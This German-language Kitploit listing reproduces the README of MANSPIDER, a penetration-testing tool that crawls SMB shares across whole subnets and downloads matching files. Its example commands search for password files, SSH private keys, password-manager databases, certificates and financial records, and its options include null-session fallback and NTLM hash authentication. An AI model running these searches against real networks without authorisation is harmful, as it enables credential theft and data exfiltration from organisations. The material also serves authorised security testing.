Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
MANSPIDER — Durchforste ganze Netzwerke nach interessanten Dateien, die sich auf SMB-Freigaben befinden. Suche in Dateinamen oder Dateiinhalten - regex unterstützt! | Kitploit
Tools/GitHubGitHub/blacklanternsecurity/manspider
OSINT (Open-Source-Intelligence)DatenexfiltrationInformationsbeschaffungNetzwerksicherheitPenetrationstests
GitHubblacklanternsecurity/manspider

MANSPIDER

Durchforste ganze Netzwerke nach interessanten Dateien, die sich auf SMB-Freigaben befinden. Suche in Dateinamen oder Dateiinhalten - regex unterstützt!

Repository anzeigen
1.4k161vor 4 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

MANSPIDER

Durchforsten Sie SMB-Freigaben nach interessanten Informationen. Dateiinhaltsuche + Regex wird unterstützt!


Neuerungen in v2.0

Manspider 2.0 ist da! Dies bringt bedeutende Verbesserungen:

  • Neue und verbesserte Textextraktion unterstützt von Kreuzberg – jetzt mit PDF, DOCX, XLSX, PPTX, Bildern mit OCR und vielen weiteren Formaten
  • Modernes Paketmanagement mit uv für schnellere, zuverlässigere Installationen
  • Python 3.14 Unterstützung – bereit für die neuesten Python-Versionen
  • Datumsfilter – Dateien nach Änderungsdatum durchsuchen mit --modified-after und --modified-before
  • Umfassende Unit-Tests – verbesserte Zuverlässigkeit und Stabilität

manspider

Unterstützte Dateitypen:

  • PDF
  • DOCX
  • XLSX
  • PPTX
  • jedes textbasierte Format
  • und viele mehr!!

MANSPIDER wird jede Freigabe auf jedem Zielsystem durchforsten. Falls die angegebenen Anmeldedaten nicht funktionieren, wird auf "Gast" und dann auf eine Null-Sitzung zurückgegriffen.

manspider

Installation

Schnellstart mit uvx (empfohlen)

root@kitploit:~
# Direkt ausführen ohne Installation
uvx --from git+https://github.com/blacklanternsecurity/MANSPIDER manspider --help

Installation mit uv

root@kitploit:~
# Global installieren
uv tool install git+https://github.com/blacklanternsecurity/MANSPIDER

# Ausführen
manspider --help

Installation mit pipx

root@kitploit:~
pipx install git+https://github.com/blacklanternsecurity/MANSPIDER

Optionale Abhängigkeiten

Manspider verwendet Kreuzberg zur Textextraktion aus verschiedenen Dateiformaten. Einige Formate erfordern zusätzliche Systemabhängigkeiten:

root@kitploit:~
# Für OCR-Textextraktion aus Bildern (PNG, JPEG usw.)
sudo apt install tesseract-ocr

# Für Unterstützung älterer Microsoft Office-Formate (.doc, .xls)
# Kreuzberg verwendet LibreOffice zur Konvertierung
sudo apt install libreoffice

Ohne diese Abhängigkeiten: Manspider funktioniert weiterhin für PDF, DOCX, XLSX, PPTX und Textdateien, überspringt jedoch Bild-OCR und ältere Office-Formate.

Installation (Docker)

root@kitploit:~
docker run --rm -v ./manspider:/root/.manspider blacklanternsecurity/manspider --help

Hinweis: Es gibt außerdem ein Hilfsskript manspider.sh, das automatisch Volumes für die Verzeichnisse loot und logs von manspider einbindet, was die Ausführung etwas komfortabler macht:

root@kitploit:~
./manspider.sh --help

Beispiel #1: Netzwerk nach Dateinamen durchsuchen, die möglicherweise Anmeldedaten enthalten

HINWEIS: Passende Dateien werden automatisch nach $HOME/.manspider/loot heruntergeladen! (-n zum Deaktivieren)

root@kitploit:~
$ manspider 192.168.0.0/24 -f passw user admin account network login logon cred -d evilcorp -u bob -p Passw0rd

Beispiel #2: Nach Tabellenkalkulationen mit "password" im Dateinamen suchen

root@kitploit:~
$ manspider share.evilcorp.local -f passw -e xlsx csv -d evilcorp -u bob -p Passw0rd

Beispiel #3: Nach Dokumenten suchen, die Passwörter enthalten

root@kitploit:~
$ manspider share.evilcorp.local -c passw -e xlsx csv docx pdf -d evilcorp -u bob -p Passw0rd

Beispiel #4: Nach interessanten Dateierweiterungen suchen

root@kitploit:~
$ manspider share.evilcorp.local -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg pfx cfg conf config vmdk vhd vdi dit -d evilcorp -u bob -p Passw0rd

Beispiel #5: Nach finanzbezogenen Dateien suchen

Dieses Beispiel durchsucht nach Finanz klingenden Verzeichnissen nach Dateinamen, die 5 oder mehr aufeinanderfolgende Zahlen enthalten (z.B. 000202006.EFT)

root@kitploit:~
$ manspider share.evilcorp.local --dirnames bank financ payable payment reconcil remit voucher vendor eft swift -f '[0-9]{5,}' -d evilcorp -u bob -p Passw0rd

Beispiel #6: Nach SSH-Keys anhand des Dateinamens suchen

root@kitploit:~
$ manspider share.evilcorp.local -e ppk rsa pem ssh rsa -o -f id_rsa id_dsa id_ed25519 -d evilcorp -u bob -p Passw0rd

Beispiel #7: Nach SSH-Keys anhand des Inhalts suchen

root@kitploit:~
$ manspider share.evilcorp.local -e '' -c 'BEGIN .{1,10} PRIVATE KEY' -d evilcorp -u bob -p Passw0rd

Beispiel #8: Nach Passwortmanager-Dateien suchen

root@kitploit:~
# .kdbx - KeePass Password Database (KeePass, KeePassXC)
# .kdb - KeePass Classic Database (KeePass 1.x)
# .1pif - 1Password Interchange Format (1Password)
# .agilekeychain - Agile Keychain Format (1Password, veraltet)
# .opvault - OPVault Format (1Password)
# .lpd - LastPass Data File (LastPass)
# .dashlane - Dashlane Data File (Dashlane)
# .psafe3 - Password Safe Database (Password Safe)
# .enpass - Enpass Password Manager Data File (Enpass)
# .bwdb - Bitwarden Database (Bitwarden)
# .msecure - mSecure Password Manager Data File (mSecure)
# .stickypass - Sticky Password Data File (Sticky Password)
# .pwm - Password Memory Data File (Password Memory)
# .rdb - RoboForm Data File (RoboForm)
# .safe - SafeInCloud Password Manager Data File (SafeInCloud)
# .zps - Zoho Vault Encrypted Data File (Zoho Vault)
# .pmvault - SplashID Safe Data File (SplashID Safe)
# .mywallet - MyWallet Password Manager Data File (MyWallet)
# .jpass - JPass Password Manager Data File (JPass)
# .pwmdb - Universal Password Manager Database (Universal Password Manager)
$ manspider share.evilcorp.local -e kdbx kdb 1pif agilekeychain opvault lpd dashlane psafe3 enpass bwdb msecure stickypass pwm rdb safe zps pmvault mywallet jpass pwmdb -d evilcorp -u bob -p Passw0rd

Beispiel #9: Nach Zertifikaten suchen

root@kitploit:~
$ manspider share.evilcorp.local -e pfx p12 pkcs12 pem key crt cer csr jks keystore key keys der -d evilcorp -u bob -p Passw0rd

Beispiel #10: Nach kürzlich geänderten Dateien suchen

root@kitploit:~
$ manspider share.evilcorp.local -e docx xlsx pdf --modified-after 2026-01-01 -d evilcorp -u bob -p Passw0rd

Tipp zur Nutzung #1:

Sie können mehrere Instanzen von manspider gleichzeitig ausführen. Dies ist nützlich, wenn eine Instanz bereits läuft und Sie die heruntergeladenen Dateien durchsuchen möchten (ähnlich wie grep -R). Geben Sie dazu das Schlüsselwort loot als Ziel an, das die heruntergeladenen Dateien in $HOME/.manspider/loot durchsucht.

Tipp zur Nutzung #2:

Sinnvolle Standardwerte helfen, unerwünschte Szenarien wie das Festhängen an einem einzelnen Ziel zu vermeiden. Alle können überschrieben werden:

  • Standard Spider-Tiefe: 10 (überschreiben mit -m)
  • Standard maximale Dateigröße: 10MB (überschreiben mit -s)
  • Standard Threads: 5 (überschreiben mit -t)
  • Ausgeschlossene Freigaben: C$, IPC$, ADMIN$, PRINT$ (überschreiben mit --exclude-sharenames)

Tipp zur Nutzung #3:

Manspider akzeptiert jede Kombination der folgenden Ziele:

  • IPs
  • Hostnamen
  • Subnetze (CIDR-Format)
  • Dateien, die eines der oben genannten enthalten
  • Lokale Ordner mit Dateien

Zum Beispiel könnten Sie einige oder alle dieser angeben:

  • 192.168.1.250
  • share.evilcorp.local
  • 192.168.1.0/24
  • smb_hosts.txt
  • loot (um bereits heruntergeladene Dateien zu durchsuchen)
  • /mnt/share (um ein Verzeichnis rekursiv zu durchsuchen)
    • HINWEIS: Bei der Suche in lokalen Dateien müssen Sie ein Verzeichnis angeben, keine einzelne Datei

Verwendung:

root@kitploit:~
usage: manspider [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [-l LOOT_DIR] [-m MAXDEPTH] [-H HASH] [-k] [-aesKey HEX] [-dc-ip IP] [-t THREADS] [-f REGEX [REGEX ...]] [-e EXT [EXT ...]]
                 [--exclude-extensions EXT [EXT ...]] [-c REGEX [REGEX ...]] [--sharenames SHARE [SHARE ...]] [--exclude-sharenames [SHARE ...]] [--dirnames DIR [DIR ...]]
                 [--exclude-dirnames DIR [DIR ...]] [-q] [-n] [-mfail INT] [-o] [-s SIZE] [-v]
                 targets [targets ...]

Scan for juicy data on SMB shares. Matching files and logs are stored in $HOME/.manspider. All filters are case-insensitive.

positional arguments:
  targets               IPs, Hostnames, CIDR ranges, or files containing targets to spider (NOTE: local searching also supported, specify directory name or keyword "loot" to search
                        downloaded files)

options:
  -h, --help            show this help message and exit
  -u, --username USERNAME
                        username for authentication
  -p, --password PASSWORD
                        password for authentication
  -d, --domain DOMAIN   domain for authentication
  -l, --loot-dir LOOT_DIR
                        loot directory (default ~/.manspider/)
  -m, --maxdepth MAXDEPTH
                        maximum depth to spider (default: 10)
  -H, --hash HASH       NTLM hash for authentication
  -k, --kerberos        Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters
  -aesKey, --aes-key HEX
                        AES key to use for Kerberos Authentication (128 or 256 bits)
  -dc-ip, --dc-ip IP    IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
  -t, --threads THREADS
                        concurrent threads (default: 5)
  -f, --filenames REGEX [REGEX ...]
                        filter filenames using regex (space-separated)
  -e, --extensions EXT [EXT ...]
                        only show filenames with these extensions (space-separated, e.g. `docx xlsx` for only word & excel docs)
  --exclude-extensions EXT [EXT ...]
                        ignore files with these extensions
  -c, --content REGEX [REGEX ...]
                        search for file content using regex (multiple supported)
  --sharenames SHARE [SHARE ...]
                        only search shares with these names (multiple supported)
  --exclude-sharenames [SHARE ...]
                        don't search shares with these names (multiple supported)
  --dirnames DIR [DIR ...]
                        only search directories containing these strings (multiple supported)
  --exclude-dirnames DIR [DIR ...]
                        don't search directories containing these strings (multiple supported)
  -q, --quiet           don't display matching file content
  -n, --no-download     don't download matching files
  -mfail, --max-failed-logons INT
                        limit failed logons
  -o, --or-logic        use OR logic instead of AND (files are downloaded if filename OR extension OR content match)
  -s, --max-filesize SIZE
                        don't retrieve files over this size, e.g. "500K" or ".5M" (default: 10M)
  -v, --verbose         show debugging messages
  --modified-after DATE
                        only show files modified after this date (format: YYYY-MM-DD)
  --modified-before DATE
                        only show files modified before this date (format: YYYY-MM-DD)

Entwicklung

Tests

Hinweis: Die Ausführung der gesamten Testsuite erfordert die oben aufgeführten optionalen Systemabhängigkeiten (tesseract-ocr und libreoffice).

root@kitploit:~
# Tests ausführen
uv run pytest tests/

Linting

Dieses Projekt verwendet ruff für Linting und Formatierung.

root@kitploit:~
# Linter ausführen
uv run ruff check .

# Linter mit automatischer Korrektur ausführen
uv run ruff check --fix .

# Formatierer ausführen
uv run ruff format .
Tool herunterladen